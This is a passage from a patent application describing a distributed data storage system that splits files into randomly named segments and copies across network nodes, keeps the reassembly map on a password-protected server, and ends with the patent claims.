When so notified, the backup server would retrieve the DDSS server's files and/or client files from a backup device, and run in place of the primary server until communication with the primary server is regained. - [0065]In some embodiments, the DDSS may have a secondary or backup server module component installed at a client node within proximity to a logical grouping of client nodes. For example, suppose a business is located in a building having three floors, and each floor defines a logically grouped domain or node cluster for the network (e.g., a sales, marketing and design domain of the network). Each floor may designate a backup which, in the event of failure of the DDSS primary server, acts as a local backup DDSS server to serve the nodes on that floor. - [0066]The DDSS server may maintain information about a DDSS client in a client account record managed by a server-based account manager utility. A client account record may include such information as a network node address, the client's viewing or access rights to the server storage space and/or remote devices, the client's quota of storage space, the location(s) of backup files, and client verification information used when a DDSS session request is received from a node, e.g., a password and node associated with the client. A viewing right refers to a right to see files, folders and/or directories, but not inspect their contents. An access right gives the right to view at least a portion of the contents of a file. In some embodiments, clients may be given access rights to some files, but only viewing rights to others when directories are shared between different clients. In some embodiments clients may view and access files only at the client's allocated root directory and directories below the allocated root directory. - [0067]A DDSS session request would be initiated by the client, e.g., at node 2 in FIG. 1.
The user accesses the login screen provided by a client-side application, e.g., client module 20 b, and enters the password for the DDSS client for that DDSS node. The server-side application, e.g., server module 20 a, receives a request for a session with an accompanying password and node ID. The received node and password are checked against the client account records to verify that a user is submitting a valid request for access to the DDSS for that node. When the correct information is received, the server grants read/write privileges to the client node's portion of the server space. - [0068]Client accounts may also include information that is needed to re-initialize DDSS connections, increase or decrease the space allocated to a client, and other client-specific information needed by a server. Some of this information may also be available through a network server or manager. After a client has successfully logged into the DDSS, the user at the client node may read data from, and write data to, the DDSS storage space in the manner that it is accustomed to under the client's operating system. The DDSS space is mapped to the client's filesystem as one or more volumes. One utility that can be used to map a filesystem and its associated namespace structure to one or more networked computers is the file sharing utility of the Microsoft Windows XP® operating system. Other commercially available applications that interface to an operating system's API to provide a user with file-sharing capabilities among one or more nodes connected over the network may also be used. - [0069]As such, a DDSS read/write capability, as explained next, may be readily implemented over an existing network. A network user would only need to manage its local filenames and directories under the DDSS device(s) as it would for any other device in its filesystem.
The third person pronoun “it” is intended to refer to either a real person interacting with a client computer through a local I/O device, such as a mouse, or a remote computer that accesses the client computer. As such, “user” under this disclosure may be either a real person or a computer that remotely controls a DDSS computer at a network node. - [0070]A DDSS read and write process will now be described with reference to the network depicted in FIG. 1. The computer, e.g., a multi-function printer, at node 1 in FIG. 1 has installed a server module 20 a and is designated as the DDSS server. Similarly, the computer, e.g., a PC, at node 2, has installed client module 20 b and is designated as a DDSS client. As DDSS server functions (as implemented through server module 20 a) use resources at the node 1 computer, computer resources such as its operating system, storage devices, virtual memory (e.g., static and dynamic RAM), I/O devices, etc. at node 1 will, for the sake of convenience, be referred to as the DDSS server operating device, memory device, etc. Similarly, as DDSS client functions (as implemented through client module 20 b) use resources at the node 2 computer, its computer resources will, for the sake of convenience, be referred to as the DDSS client operating device, memory device, etc. Computer resources of a server and/or client, respectively, may be shared with other network tasks, e.g., local e-mail sending/receiving and internet activities. Thus, the designation of, e.g., a server storage or I/O device, should not be interpreted as a DDSS-dedicated storage or I/O device, although in some embodiments these devices can be dedicated to DDSS-related tasks. - [0071]Both the server module 20 a and client module 20 b may perform tasks associated with storing a user's file according to a DDSS write process (FIG. 3), a read process (FIG. 4), and a file modify process (FIG. 5). - [0072] FIGS.
2A and 2B are tables describing tasks associated with the client module 20 b and server module 20 a. The client module 20 b includes a SEGSELECT module, PARTITION module, WRITEMAP module and R/W module. The server module 20 a includes a NODEQUERY module, DRIVEINSPECT module, and a GENPATH module. As discussed earlier, the server module may also include an account manager utility for managing client accounts. As will be understood, read/write-related tasks may be distributed differently between the server module 20 a and client module 20 b. Thus, it should be understood that the functions associated with a particular module, as depicted in FIGS. 2A and 2B, need not all reside in that module, or entirely with the server and client, respectively. Rather, it is contemplated that tasks may be assigned or shared differently among modules, and/or additional modules may be used to perform some of the tasks assigned to one module. In some embodiments, client module 20 b may perform tasks 311-315 of a write process, and server module 20 a tasks 301-306, as depicted in FIG. 3. - [0073]A user at node 2 (“CLIENT2”) wishes to store a file in the DDSS. This process may be initiated by the user simply initiating a write procedure at the DDSS server space assigned to the client, which is detected by the server. The write may not be carried out in whole or in part, but rather suspended and re-directed by the client module. The client module, with the assistance of the server module, will then direct the write to the DDSS storage space according to a DDSS write process. - [0074]The client's DDSS storage space will be called “s:\node2”. The server may be notified of the write attempt either by its operating system detecting a system call, or by a write notification received from the client. The file may have been generated by an application resident at the client computer, or may be an existing file that is being moved to s:\node2.
The logical name of this file in the CLIENT2 filesystem will be “FILEA”. - [0075]After the write attempt is detected or a write request is sent to the server, the server module 20 a and client module 20 b perform the DDSS write process. This process includes transferring the real data in FILEA to the DDSS storage space assigned to CLIENT2. The real data is segmented and stored in different files called file segments. After the real data in FILEA is transferred, DDSS meta data is generated describing where the file segments of FILEA are located, and the order in which FILEA is re-assembled from the file segments. This DDSS meta data is stored in physical memory only at the DDSS server, which is password protected. - [0076]When the server detects, or is notified of, a write request, the file's logical name and size, and the node requesting the write, are reported to the module NODEQUERY. This module is tasked with surveying all remote storage space accessible to the DDSS, and choosing from among the most preferred nodes for writing FILEA. Hereinafter these devices or storage spaces, accessible through the nodes of the network, shall simply be called “nodes”. Thus, in FIG. 1, the DDSS has four nodes for storing data, or four nodes having storage space, because at each of the nodes 1-4 there are respective shared storage devices 1 c, 2 c, 3 c and 4 c having DDSS-accessible storage spaces 11, 12, 13 and 14. - [0077]NODEQUERY includes a node prioritization algorithm that prioritizes nodes for storage based on a variety of factors. For example, the nodes given the highest priority for storage may be the nodes that are connected through a high bandwidth connection, nodes that have the lowest rate of packet errors, nodes that are located relatively close to the DDSS client, and so on. Nodes may also be prioritized by the amount of network activity at the node, or read/write requests on the storage device(s) connected to the node. Thus, a node that is currently not being used may be chosen over a node that is experiencing a high volume of read/write requests.
NODEQUERY may at regular intervals “ping” each DDSS node so that it will have on-demand information about the level of activity at every DDSS node when a write request is received from a client. - [0078]A node may be given a lower priority if it has a small amount of available disk space relative to the size of FILEA. A node that is currently not available, e.g., because the device at the node is disabled, would be excluded from the list of nodes under consideration. NODEQUERY may also notify a client in response to a write request that FILEA exceeds its allocated DDSS space. This information may also be communicated to the user prior to notifying the server that a DDSS write is requested. - [0079]A prioritized list of nodes for storage of FILEA is created at step 302 and held in NODEINFO. This array of node information may simply provide a prioritized list of nodes and the available space at each node. At step 303, NODEINFO is sent to client module 20 b. - [0080]At step 311 client module 20 b selects, based on the information in NODEINFO, the amount of partitioning for FILEA. The partitioned real data in FILEA is organized into data segments. The number of data segments for FILEA may be based on at least one of privacy concerns for the user's data, the available space, and the rate and/or manner at which data can be written to a remote device (e.g., block size for reading/writing). For example, if FILEA is segmented across all available nodes, then no one node has any portion of data from FILEA that can provide any meaningful information about the contents of FILEA because the data is widely dispersed over the network. Additionally, several file segments may be written to the same device to further distribute the real data. The amount of segmentation may also be based only on the available space at the various nodes. Thus, FILEA may be partitioned into several segments so that its contents can be stored at the available nodes.
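The node survey performed by NODEQUERY, and the prioritized NODEINFO list it produces at steps 302-303, might be sketched as follows. This is a minimal illustration only: the `Node` fields, the scoring formula and its weights are assumptions for the sketch, not taken from the specification.

```python
from dataclasses import dataclass

@dataclass
class Node:
    name: str
    bandwidth_mbps: float    # speed of the connection to the node
    packet_error_rate: float # fraction of packets lost per transmission
    pending_requests: int    # current read/write load at the node
    free_bytes: int
    available: bool = True   # False if the device at the node is disabled

def node_score(node: Node) -> float:
    # Higher bandwidth raises the score; packet errors and load lower it.
    return node.bandwidth_mbps * (1.0 - node.packet_error_rate) / (1 + node.pending_requests)

def build_nodeinfo(nodes, file_size):
    # Exclude unavailable nodes; nodes with little free space relative to
    # the file drop in priority. Return (name, free space) pairs, best first.
    candidates = [n for n in nodes if n.available]
    candidates.sort(key=lambda n: node_score(n) * min(1.0, n.free_bytes / file_size),
                    reverse=True)
    return [(n.name, n.free_bytes) for n in candidates]

nodes = [
    Node("node1", 100.0, 0.01, 0, 10**9),
    Node("node3", 1000.0, 0.001, 5, 10**9),
    Node("node4", 10.0, 0.2, 1, 10**9, available=False),  # disabled, excluded
]
print(build_nodeinfo(nodes, file_size=10**6))  # node3 first: fast, low-error link
```

A real implementation would refresh these measurements from the periodic "pings" described above, so the scores reflect on-demand load information.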
- [0081]Step 311 also includes the selection of the number of copies of each data segment that will be stored over the network. Copies of each data segment, stored on separate nodes, may be desirable as a way of ensuring that if a data segment stored at a node later becomes unavailable, the copy can be accessed at a different node. As such, a DDSS may be configured so that there are several layers of redundancy for file segments, spread over the nodes, so that a segment not available at one node will be available at another node. - [0082]In some embodiments, client module 20 b may have a fixed number of segments and copies for a file, based on its size. In this case, the client module selects up to this number of segments and copies, or the maximum number of available nodes for segments and copies under NODEINFO, whichever is less. In some embodiments, the client module may select the number of nodes based on a block read/write size, which selection parameter may lead to increased efficiency during a read/write from nodes. - [0083]In some embodiments, client module 20 b may be configured to select all nodes that are above a threshold node “score” provided by NODEINFO. A node score is intended to refer to a ranking of the nodes based on a variety of factors, such as the average speed of the connection (i.e., bytes per second), type of connection (e.g., wireless, optical, etc.), the average response time to a “ping”, number of packet errors per transmission, and the computer or device type at the node. In some embodiments, the client module 20 b may contain a user-selectable number of segments and/or copies of segments. - [0084]At step 312 the client module 20 b informs the server module 20 a that FILEA will be segmented into “N” number of data segments and “M” number of copies based on NODEINFO.
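The client-side choice of "N" segments and "M" copies described above — capping a fixed maximum by the number of usable nodes, and filtering nodes by a threshold score — could look roughly like this sketch. Every name and parameter here is illustrative; only the capping and threshold behavior comes from the passage.

```python
def choose_layout(nodeinfo, max_segments, max_copies, threshold=0.0):
    # nodeinfo: prioritized list of (node_name, score) pairs from the server.
    # Keep only nodes whose score exceeds the threshold, then cap the number
    # of segments and copies by the number of usable nodes, whichever is less.
    usable = [name for name, score in nodeinfo if score > threshold]
    n_segments = min(max_segments, len(usable))
    # a copy should sit on a different node than its segment
    n_copies = min(max_copies, max(len(usable) - 1, 0))
    return n_segments, n_copies

nodeinfo = [("node3", 166.5), ("node1", 99.0), ("node2", 0.4)]
print(choose_layout(nodeinfo, max_segments=4, max_copies=2, threshold=1.0))  # → (2, 1)
```

With the fixed maximum of four segments but only two nodes scoring above the threshold, the client settles on two segments and one copy, matching the "whichever is less" rule.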
- [0085]When the requested number of data segments and copies are received at the server, the GENPATH module is used to generate names for each of the file segments that store the real data from FILEA, and the corresponding logical names and addresses for the file segments. Preferably, the file segment names are randomly generated so that a user, other than the file owner, who views the written file segments without access to the FILEA meta data, cannot discern from the segment filenames what file they originate from, the order in which the real data in the segments should be combined to re-create FILEA, or whether the file segments are even related to each other. In essence, the file segments may be stored such that the portion of the real data in a file segment is worthless without the DDSS meta data to at least locate the parts of the original file. One example of DDSS meta data for FILEA is shown in FIG. 6. - [0086]In some embodiments, GENPATH may include a random number generator used to derive a random filename. For example, any suitable pseudo random number generator that returns a random number, e.g., a real number over the interval 0 to 1, may be used to randomly select each letter, number and/or symbol that when combined form the logical filename. When files are written with randomly generated logical names in this manner, any relationship among the files should not be detectable by inspection of the logical names, especially when there are many other, unrelated files in the folder or directory that also have filenames that were randomly generated. Indeed, for purposes of making it more difficult for an unauthorized user to extract meaningful information from file segments, it may be desirable to have all DDSS clients' file segments stored in the same directory or folder of a remote storage space. In this way, it will be more difficult to find file segments that are related to each other. 
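The character-by-character random filename generation described for GENPATH might be sketched as follows; the alphabet, name length and function name are assumptions for illustration.

```python
import random
import string

def random_segment_name(rng, length=12):
    # Draw each character independently from a pseudo random number
    # generator, so the resulting logical filename reveals nothing about
    # the source file, the segment order, or any relationship to other
    # segment files stored in the same directory.
    alphabet = string.ascii_lowercase + string.digits
    return "".join(rng.choice(alphabet) for _ in range(length))

rng = random.Random()  # any suitable pseudo random number generator
names = [random_segment_name(rng) for _ in range(3)]
print(names)  # three unrelated-looking segment filenames
```

Because each name is drawn independently, dropping all clients' segments into one shared folder (as suggested above) leaves no naming pattern to group related segments by.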
- [0087]Further steps may be taken to ensure that meaningful information cannot be obtained from the file segments. For example, meta data can be stored at the server, as opposed to with the file segment or directory at the remote node. In some embodiments, file segments written to the same node can be written in a non-sequential, random or intermittent fashion. For example, if FILEA were segmented into six segments with filenames S1, S2, S3, S4, S5 and S6, and designated for storage at nodes A and B, the write sequence may be directed to prevent any two consecutive file segments (i.e., file segments having real data portions that immediately follow each other in the original FILEA) from being written to the same node. Thus, segments S1, S3 and S5 would be written to node A, and segments S2, S4 and S6 would be written to node B. As segment S2 was not stored at the same node as S1 and S3, it should be more difficult to extract meaningful information from the real data in S1 and S3, or the real data in S2, S4 and S6, etc. if the unauthorized user is only able to view data stored at node A or B, respectively. - [0088]The write sequence, file segment names, partitioning information for FILEA, e.g., byte offset and size for each data segment, and segment file logical paths are sent to CLIENT2 in SEGMAP at step 305. SEGMAP may also provide an alternative node for a file segment. In the event that the preferred node is unavailable to the client module 20 b, although appearing accessible to the server, the client may write to the alternative node instead of the preferred node. - [0089]In some embodiments, steps 301 and 312 may be combined and steps 311 and 312 eliminated in FIG. 3. When the server receives information about FILEA from the client at step 301, e.g., the size, name, and client requesting the write, it may also receive the client's requested number of segments and copies for the write.
This may be a preferred write process when the client's choice of nodes does not depend on the information reported in NODEINFO. The server may then gather the information it needs from NODEQUERY and then proceed directly to SEGMAP using the information in NODEINFO and the N segments and M copies, which accompanied the initial write request received at step 301. The write process may then proceed to step 305. - [0090]At steps 313 and 314 the PARTITION module partitions FILEA according to SEGMAP and the R/W module writes the file segments to the DDSS storage space. Preferably, steps 313 and 314 may be carried out at the same time, i.e., a first file segment is partitioned then written to a node, a second file segment is partitioned, then written to a node, etc. After all segments have been written to the remote devices, the WRITEMAP module constructs a MAPFILE indicating the filenames and corresponding logical paths where the data segments were written, the partitioning information from SEGMAP, and file-by-file meta data such as a timestamp. In some embodiments, meta data normally stored with the file is removed and instead stored in the MAPFILE so that an unauthorized user at a remote node cannot use the meta data to re-assemble the real data in the file segments. The amount of meta data that can be stored at the server and not at a node, i.e., not with the local filesystem, may be limited by the filesystem upon which a DDSS operates. - [0091]If all files were written to the nodes specified in SEGMAP, and in the order specified by SEGMAP, then MAPFILE is the same as SEGMAP. However, if SEGMAP alternative nodes were used, or the segments were stored in a different order, then MAPFILE will have different file segment information. At step 315 the client module 20 b sends MAPFILE to the server and then deletes this file from its memory.
If the DDSS was called through an API for an application still running at the client, MAPFILE may remain in RAM at the client and then be removed from memory when the user exits the application. - [0092]When MAPFILE is sent to the server at step 315, a successful write is confirmed. At step 306 the information in MAPFILE is stored in a file called “FILEA.DDSS”. As mentioned earlier, the file FILEA.DDSS contains the meta data that enables the re-assembly of FILEA from the file segments and may include, among other things, the file meta data that would normally be stored at the remote node. - [0093]In some embodiments, SEGMAP and MAPFILE can be the same file. In these embodiments, the server module 20 a may simply store SEGMAP as FILEA.DDSS and unless a write error is reported by the client, e.g., the client indicates that an alternative node was used, the meta data stored with the server is understood as an accurate mapping for the segments written by the client to the DDSS storage space. If the client R/W module reports, for example, that an alternative node or sequence of writes was used (other than that recommended by the server in SEGMAP), then the client may simply provide an update to SEGMAP, e.g., MAPFILE, which replaces the server's copy of the meta data in FILEA.DDSS. - [0094]At step 307 a backup copy of FILEA.DDSS is made by the server. The account manager at the server may then add the logical name FILEA.DDSS.BACKUP to the CLIENT2 account record, indicating the address where a backup of the FILEA meta data may be found. - [0095]A read process for FILEA, previously stored by the DDSS write process, may proceed as depicted in FIG. 4. The read process begins when the user at node 2 selects FILEA.DDSS at step 401.
“Select” can be a double-click (because the extension “DDSS” is added, the local operating system can easily associate the file with the DDSS client-side application), a single click with a subsequent “open DDSS file” menu selection, or an “open DDSS file” command provided as an add-in to an application running on the client computer. At step 402 the R/W module reads the contents of FILEA.DDSS, which indicates that N file segments and M copies contain the real-data from file FILEA. “FILEA” is also re-created, either at s:\client2, as a file resident in RAM at the client computer, or as a temporary file accessed by an application running at the client computer. The file may have the same logical name as it did when it was originally placed there by the user. The DDSS read process reads the real-data in the file segments and stores them in FILEA according to the meta data in FILEA.DDSS such that FILEA is identical to the version originally indicated for storage under the DDSS. - [0096]FILEA.DDSS may contain information indicating the owner of FILEA, in addition to the information needed to retrieve the FILEA segments, segment copies, and the information needed to re-assemble FILEA from the file segments. One example of FILEA.DDSS is the record 59 depicted in FIG. 6. A first record 60 indicates the ownership of FILEA by the CLIENT2 60 a and node 2 address 60 b. A second record 62 indicates the user's filename 62 a (FILEA), the number of file segments for FILEA 62 b (N), and the number of copies of segments 62 c (M). - [0097]A third record 64 provides N rows of data corresponding to each of the N file segments. The first column 64 a indicates the order in which the file segments identified in subsequent columns 64 b, 64 c and 64 d are to be written/were written to the remote nodes.
Columns 64 b indicate the logical names and logical paths for the file segments, respectively, and columns 64 c indicate the start position (as a byte offset) and size (in bytes) of the real data portion in FILEA for the segment, respectively. Columns 64 d may provide the meta data related to the most recent read and write of the segment to the remote node. As indicated by the sequence 3, 1, 2, . . . in column 64 a, the segments may be written to remote nodes in a non-sequential order for the reasons discussed earlier. As also discussed earlier, the logical filenames may be randomly generated and no consecutive segments, e.g., “name-1” and “name-2”, may be written to the same node. - [0098]A fourth record 66 provides M rows of data corresponding to each copy of a file segment in record 64. Some or all file segments may have one or more copies, or levels of redundancy. The first column 66 a indicates, as before, the order in which the copies identified in subsequent columns 66 b, 66 c and 66 d are to be written/were written to the remote nodes. Columns 66 b indicate the logical names and logical paths for the copies, and column 66 c indicates which segment from the record 64 corresponds to the copy. Columns 66 d may provide the meta data related to the most recent write and read to the remote nodes. - [0099]Returning again to FIG. 4, the DDSS read process begins at 403. For each of the N segments, which together contain all real-data from FILEA, the R/W module first checks to see whether the segment “SEG(i)” specified in record 64 is accessible at step 404. If SEG(i) is intact and accessible then it is read into FILEA at step 405, starting at the byte offset specified at 64 c in record 64. After all N segments have been read into FILEA, the DDSS read process terminates. If FILEA is too big to hold in virtual memory, then FILEA may be written to temporary storage.
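The meta data record 59 described above (ownership record 60, file record 62, segment record 64 and copy record 66) might be represented in memory along these lines. The field names, paths and sizes are illustrative assumptions; only the record structure and the non-sequential write sequence 3, 1, 2 come from the description.

```python
# Illustrative sketch of the FILEA.DDSS meta data (record 59 of FIG. 6).
filea_ddss = {
    "owner": {"client": "CLIENT2", "address": "node2"},         # record 60
    "file": {"name": "FILEA", "n_segments": 3, "m_copies": 2},  # record 62
    "segments": [                                               # record 64
        # write order (64 a), logical name/path (64 b), byte offset and size (64 c)
        {"order": 3, "path": "//nodeA/ddss/q7rk2m", "offset": 0,    "size": 4096},
        {"order": 1, "path": "//nodeB/ddss/m1xv9t", "offset": 4096, "size": 4096},
        {"order": 2, "path": "//nodeA/ddss/z3pl8w", "offset": 8192, "size": 4096},
    ],
    "copies": [                                                 # record 66
        # write order (66 a), logical name/path (66 b), copied segment index (66 c)
        {"order": 1, "path": "//nodeC/ddss/h5tw4k", "segment": 0},
        {"order": 2, "path": "//nodeD/ddss/b8qn6r", "segment": 1},
    ],
}

def reassembly_order(meta):
    # FILEA is rebuilt by byte offset, regardless of the (non-sequential)
    # order in which the segments were written to the nodes.
    return [s["order"] for s in sorted(meta["segments"], key=lambda s: s["offset"])]

print(reassembly_order(filea_ddss))  # prints [3, 1, 2]: byte order differs from write order
```

Without this record, the randomly named segment files at the nodes carry no usable relationship to FILEA, which is why the record is held only at the password-protected server.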
- [0100]If a node is unavailable, or a segment corrupted or missing, then the R/W module attempts to access the address where a copy is stored at step 406 based on the information in record 66. The R/W module finds the copy of the missing segment from column 66 c, then attempts to access the copy using the logical name and path specified in the corresponding field 66 b. - [0101]At step 407 the R/W module checks to see whether the copy specified in record 66 is available and intact. If yes, then the copy of SEG(i) is read and stored in FILEA as before, and the R/W module turns to the next file segment, i.e., SEG(i+1), and so on. If no, then the R/W module returns to record 66 and searches for the next copy of the segment, and so on until a copy of the segment is found. The space reserved for the segments and copies of segments unavailable during the initial read are released when those respective nodes become available again (step 411). - [0102]A process for storing a file previously saved to the DDSS is depicted in FIG. 5. The process begins when the DDSS server detects an attempt to store a file having the same name as a previously stored file at step 501. Upon this occurrence, NODEINFO (see FIG. 2A) is called (step 502) to indicate whether the paths in FILEA.DDSS are available for storage at step 503. If all paths are available, then server module 20 a directs the client module 20 b to use the information in FILEA.DDSS in place of SEGMAP from step 305, and then partition and write FILEA to the specified nodes at steps 313 and 314, as described earlier. Steps 306 and 315 are repeated. If a node address specified in FILEA.DDSS is not available, then the write process is repeated from step 303. That is, a revised NODEINFO is sent to the client (step 303), a new set of segments and copies are selected at step 311, etc. When the unavailable nodes become available, the DDSS server deletes the previous segment files at those nodes.
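The read loop with copy fallback described in steps 404-407 above might be sketched as follows. The `read_segment` callback, the structure of `meta`, and all names are illustrative assumptions for the sketch.

```python
def read_file(meta, read_segment):
    # read_segment(path) returns the segment bytes, or raises OSError when
    # the node is unavailable or the segment is missing/corrupt (step 404).
    recovered = {}
    for i, seg in enumerate(meta["segments"]):
        # Try the primary segment first, then each copy at a different node
        # (steps 406-407), until one is available and intact.
        candidates = [seg["path"]] + [c["path"] for c in meta["copies"] if c["segment"] == i]
        for path in candidates:
            try:
                recovered[seg["offset"]] = read_segment(path)
                break
            except OSError:
                continue  # search record 66 for the next copy
        else:
            raise IOError(f"no reachable copy of segment {i}")
    # Re-assemble FILEA by byte offset.
    return b"".join(recovered[off] for off in sorted(recovered))

# Tiny demonstration: node B is unreachable, so segment 2 is read from its copy.
store = {"//A/s1": b"hel", "//B/s2": b"lo ", "//C/s2copy": b"lo ", "//A/s3": b"world"}
down = {"//B/s2"}
def read_segment(path):
    if path in down or path not in store:
        raise OSError(path)
    return store[path]

meta = {
    "segments": [
        {"path": "//A/s1", "offset": 0},
        {"path": "//B/s2", "offset": 3},
        {"path": "//A/s3", "offset": 6},
    ],
    "copies": [{"path": "//C/s2copy", "segment": 1}],
}
print(read_file(meta, read_segment))  # b'hello world'
```

The loop mirrors the specification's behavior: the client only fails a read when every copy of a segment, at every node, is unreachable.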
- [0103]Server module 20 a includes a DRIVEINSPECT module for performing housekeeping functions for the DDSS storage space. This module may remove segments or copies of segments that were not accessible and re-written or replaced by alternative or new segments or copies. DRIVEINSPECT receives logical names and paths of segments/copies that the R/W module is not able to access. Then, when a node becomes available again, DRIVEINSPECT performs the housekeeping to free up device space. DRIVEINSPECT may also perform backup functions for client *.DDSS files stored on the server space, and/or monitor remote node disk space directly or through a network server. This module may also be located at a client, as opposed to with the server. - [0104] FIG. 7 depicts a second embodiment of a network configured as a DDSS. In this embodiment, the node 1 is, once again, designated as the primary DDSS server and has installed locally the server module 20 a. Server 1 also has a local storage capacity 1 c, with storage 11 b allocated for non-DDSS use and a storage space 11 for DDSS server activities, as in other embodiments. - [0105]The network depicted may be a centralized network, such as a star network, or a decentralized network, such as a bus or ring network. The network may be any network topology where nodes are typically organized logically or physically into separate domains. For example, the nodes may be organized into physical domains based on the physical location of nodes, connection types between node groups, etc., or logically according to the shared resources or information among nodes, or related functions performed by member users at the nodes, e.g., sales versus administrative employees of a company. - [0106]In some embodiments, the nodes are connected to, or accessible from, the network according to the different functional groupings of a company.
For example, suppose a company has grouped its nodes over the network according to the nodes used, assigned or allocated to sales, marketing, and engineering groups. The network linking all of these groups of the company may then be organized such that nodes 100, 102 and 104 serve as gateway nodes to a group. “Gateway” here is intended to mean a node that connects a first network to a second network or simply a node that provides a serial path connection between groups. In another embodiment, the paths 100 a, 102 a, 104 a which connect the domains i, ii, and iii to the server 1 are not limited to a single serial connection, but rather may include a separate connection for each of the local domain nodes to one or more of the nodes in or accessible to the network. In this case, the nodes 100, 102 and 104 may therefore represent a network switch connecting each of the nodes in the sales, marketing and engineering groups to all other nodes over the network. - [0107]Within each of the domains i, ii, iii there are one or more nodes that are connected to storage devices that are part of a DDSS storage space, and one or more nodes that are DDSS enabled clients. The DDSS storage space may include such devices as workstations and printers associated with a domain. Client management and DDSS meta data are stored and managed at server 1, which may be associated with a network server or may simply be one of the nodes of a domain. Within a domain, e.g., domain iii, there are nodes 101, 102, 103 connected to the network through paths 101 a, 102 a and 103 a that, as mentioned earlier, may be connected to the rest of the network by a gateway or a network switch 100. Nodes 101, 102 and 103 may each be DDSS clients, or both DDSS clients and DDSS storage nodes. - [0108]The initialization of the DDSS is similar to that discussed earlier. In the case of a decentralized network, each client may map the storage space directly by accessing a node.
In a centralized network, the client may receive rights to read/write to DDSS nodes through a central server and have a local mapping of the allocated DDSS storage space. The server 1 may gain access to DDSS storage space in the same manner. Similarly, DDSS server space may be requested directly from the server or by a central server for the network. - [0109]The read/write priorities, as specified in SEGMAP, may prioritize nodes for storage that share the same domain as a DDSS client. For example, the available storage at a local printer may be designated as a default DDSS node for storage for clients that are part of that domain. If the storage at the printer becomes unavailable, then a less preferred node, e.g., a node of another domain, would be selected. - [0110]In some embodiments, the DDSS may have a secondary or domain DDSS server node designated at a node within each domain. Each of these domain DDSS servers would receive periodic information about the read/write meta data for members of the domain from the central server 1, as well as copies of the DDSS client accounts at that domain. In the event that the server 1 becomes unavailable, detected either by a message received from a DDSS client or by a failed status request from the backup server to the primary server, the domain DDSS server would become active and assume the roles of the primary server 1 for just that domain. In the event that a backup or domain DDSS server is needed, the DDSS nodes for storage may be limited to the DDSS storage space within the domain.
- 1. A method of storing a file over a network having a client, a server node, and nodes A and B, comprising the steps of: the client accessing storage space at the server node after the server recognizes the client as a client of the server; writing a first data segment of the file to node A and a second data segment of the file to node B, including the steps of: choosing node A and node B for storage of the first and second data segments, respectively, generating a segment A filename for the first data segment and a segment B filename for the second data segment, and the client writing Segment A to node A and Segment B to node B; and after writing segments A and B, the server saving a map that enables the re-assembly of the file from the first and second data segments. - 2. The method of claim 1, wherein the client writing step occurs over a communication link with each of nodes A and B and independent of the server. - 3. The method of claim 1, further including the client assigning file names for Segments A and B such that no portion of the logical name of the segment files is relatable to a portion of the logical name of the file. - 4. The method of claim 3, wherein the non-relatable file names are generated from a random number. - 5. The method of claim 4, wherein the client is adapted for performing at least one of the steps of receiving the logical names from the server and generating the logical names from a random number. - 6. The method of claim 1, further including the server selecting nodes A and B based on a node-selection algorithm and recommending nodes A and B to the client. - 7. The method of claim 6, wherein the node-selection algorithm selects nodes A and B based on at least one of the following criteria: the level of network traffic at a node, the number of packet errors per transmission to/from a node, the type of storage medium at the node, and the type of communication link between the client node and node. - 8.
The method of claim 1, further including the server assigning a node score to each of the nodes A and B and the client selecting A and B based on each of the nodes exceeding a threshold node score reflecting a capability for the node to receive the data compared to other nodes over the network. - 9. The method of claim 1, further including the client erasing the map after the segment A and segment B data is written to nodes A and B, respectively, and wherein the map relates the data in Segment A and Segment B to the relative locations of the data in the file, and the location of the segment A and segment B on the network, such that the map is needed to form the file from the data in the segment A and segment B files. - 10. The method of claim 1, wherein the saving of the map step includes at least one of encrypting the map contents at the server node, and storing the map in a client only, password-protected location at the server node. - 11. The method of claim 1, wherein the map includes the segment A and B filenames, the location of nodes A and B, information identifying the client node, and meta data. - 12. The method of claim 1, wherein the client node is configurable for separate communication links with a plurality of nodes, including at least the server node, and nodes A and B, further comprising the steps of:the client requesting from the server the available nodes for data storage and then receiving from the server the availability of the plurality of nodes,the client segmenting the file into Segments A and B based on the availability of nodes A and B, andthe client writing Segments A and B to the respective nodes A and B, and a copy of the Segment A to a different one of the available plurality of nodes. - 13. 
The method of claim 12, wherein the client node includes an application resident at the client node, wherein the application requests the file, such that if the segment A is not accessible to the client node, the map directs the client to select the copy of segment A from the different one of the available plurality of nodes, and the application reading the copy of segment A. - 14. A file storing method for storing a file over a network having a plurality of storage devices at network nodes, the file containing real data, comprising the steps of: partitioning the real data into a plurality of real data segments; generating a random filename for each one of the real data segments; associating each of the real data segments with its respective randomly generated filename; and storing each of the real data segments on one of the plurality of storage devices. - 15. The method of claim 14, wherein the storing step includes storing the metadata needed to reconstruct the file from the data segments at a restricted node on the network, accessible to only the owner of the file. - 16. The method of claim 14, wherein the storing step includes storing the real data segments in an order such that no data segment on a node can provide information about the type of information communicated by the data contained in the file. - 17. The method of claim 14, wherein the real data segments are partitioned from the file according to a sequential order according to their relative byte locations in the file, and the real data segments are stored on one or more of the plurality of nodes in one of a random, intermittent or non-sequential order. - 18. The method of claim 14, wherein each of the partitioning, generating, associating and storing steps are carried out by accessing a local filesystem managed by a local operating system. - 19.
A computer network, comprising a second communication link between the client and the server such that the client is enabled for accessing the information needed to re-assemble the file when the client wishes to re-assemble the file from the data segments. - 20. The computer network of claim 19, wherein the file is associated with source data comprising the plurality of data segments, further including: a plurality of redundant data segments stored at one or more of the plurality of storage spaces, such that no copy of a data segment is located at the same node as the respective data segment. - 21. A method for a computer to access data associated with a user's file, the data being stored as a plurality of data segments distributed over a network having nodes, and as a plurality of copies of the data segments over the nodes, comprising the steps of: the computer requesting from a network node the locations of the data segments and copies of data segments; the computer accessing a node in order to retrieve a data segment; if the node is inaccessible, accessing a different node where a copy of the segment is stored; and repeating the accessing the copy of the segment at a different node step until a copy of the segment is accessible to the computer. - 22. Server software residing on a storage medium, comprising a fourth portion for limiting access to the map file to only the owner of the source file. - 23. The server software of claim 22, further comprising a server part and a client part, the server part comprising the first, second, third, fourth and fifth portions, and the client portion being downloadable over a network by a node designated as a client node, and each of the server and client parts being adapted to run as applications through an interface provided by a local operating system. - 24.
Client software residing on a storage medium, comprising a fifth portion for gaining access to a map file on a network node, the map file containing the communicated relationship between the filenames and the nodes where the data portions reside, and the relationship between the data portions and the data in the source file. - 25. The client software of claim 24, wherein the fourth portion includes a client password and node identification information for gaining access to the map file, and the fourth portion includes a component for removing the information residing in the map file after all data portions have been successfully written and the relationships communicated to another computer.
https://patents.google.com/patent/US20090222509A1/en
